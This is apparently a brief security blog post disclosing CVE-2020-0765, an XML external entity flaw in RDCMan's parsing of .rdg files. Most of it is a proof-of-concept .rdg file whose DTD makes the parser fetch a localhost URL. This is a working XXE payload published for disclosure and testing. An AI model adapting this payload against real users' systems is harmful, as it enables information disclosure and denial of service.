March 11, 2020

CVE-2020-0765: Quick proof of concept

Remote Desktop Connection Manager (RDCMan) spins up ancient XmlReader and XmlTextReader instances without considering DTD and entity handling, resulting in a bag of information disclosure (and denial of service) vulnerabilities. Here's a quick .rdg I put together to test against.

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE foo [
<!ELEMENT file (#PCDATA)>
<!ENTITY foo SYSTEM "http://localhost:11223/">]>
<RDCMan programVersion="2.7" schemaVersion="3">
  <file>
    <credentialsProfiles />
    <properties>
      <expanded>True</expanded>
      <name>test</name>
      <junk>&foo;</junk>
    </properties>
    <server>
      <properties>
        <name>test</name>
      </properties>
    </server>
  </file>
  <connected />
  <favorites />
  <recentlyUsed />
</RDCMan>